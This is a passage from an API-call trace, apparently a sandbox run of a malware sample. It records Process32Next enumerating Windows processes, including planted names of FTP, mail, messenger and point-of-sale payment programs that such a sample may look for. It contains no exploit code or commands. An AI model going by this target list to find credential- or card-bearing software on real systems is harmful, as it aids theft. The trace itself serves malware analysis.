lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.129] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0173.131] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.137] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0173.139] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.142] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0173.144] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0173.186] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0173.188] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0173.191] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0173.193] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.210] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.212] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.215] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0173.217] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.219] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.222] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.224] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.226] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.228] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0173.230] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0173.233] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0173.343] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0173.346] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0173.348] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0173.351] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0173.353] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0173.354] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0173.356] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0173.358] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0173.361] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0173.363] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0173.366] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0173.368] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0173.371] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0173.374] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0173.384] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0173.424] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0173.426] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0173.428] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0173.430] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0173.432] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0173.435] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0173.438] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0173.440] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0173.442] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0173.445] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0173.449] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0173.451] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0173.453] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0173.456] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0173.458] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0173.468] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0173.471] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0173.474] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0173.475] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0173.477] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0173.481] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0173.483] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0173.488] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0173.491] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0173.493] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0173.496] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0173.498] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0173.501] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0173.504] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0173.511] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0173.513] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0173.516] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0173.518] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0173.521] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0173.524] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0173.526] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0173.528] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0173.531] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0173.534] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0173.536] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0173.538] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0173.540] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0173.543] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0173.555] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0173.558] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0173.561] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.564] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0173.567] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, 